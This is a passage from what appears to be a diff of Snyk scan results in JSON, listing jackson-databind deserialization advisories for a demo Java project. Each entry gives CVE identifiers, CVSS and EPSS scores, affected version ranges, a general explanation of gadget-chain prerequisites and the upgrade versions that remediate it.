Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2058)\n", + "epssDetails": { + "percentile": "0.82708", + "probability": "0.00890", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-12023" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6wqp-v4v6-c87c" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:16:09.944095Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-29T17:15:50Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:15:49Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:43.326081Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:45.223431Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:22.234808Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.637612Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:45.223431Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:22.234808Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks via the ` slf4j-ext` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14718`) is not identical to `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.92634", + "probability": "0.04626", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14718" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-645p-88qh-w398" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:21:07.540945Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:19:49Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:19:41Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:22.234808Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.008907Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:33.930153Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.195569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:48.008907Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:33.930153Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform an XML External Entity (XXE) Injection via the `JDK` classes due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14720`) is not identical to `CVE-2018-12018`, `CVE-2018-14729`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.84205", + "probability": "0.01052", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14720" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-x2w5-5m2g-7h5m" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:21:22.141403Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:20:17Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:19:17Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:33.930153Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x", + "title": "GitHub Release Notes" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.151247Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:21.823657Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.120318Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:48.151247Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:21.823657Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack via the `blaze-ds-opt` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14719`) is not identical to `CVE-2018-12018`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n- [GitHub Release Notes](https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x)\n", + "epssDetails": { + "percentile": "0.85805", + "probability": "0.01269", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14719" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-4gq5-ch57-c2mg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:23:45.326350Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:22:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:22:38Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:21.823657Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 10, + "modificationTime": "2024-03-11T09:46:43.143163Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", + "cvssV3BaseScore": 6.8, + "modificationTime": "2024-03-11T09:51:21.774444Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.565013Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:43.143163Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:21.774444Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `axis2-jaxws` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14721`) is not identical to `CVE-2018-12018`, `CVE-2018-14719`, `CVE-2018-14720`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.85710", + "probability": "0.01257", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14721" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-9mxf-g3x6-wv74" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:25:40.161831Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": 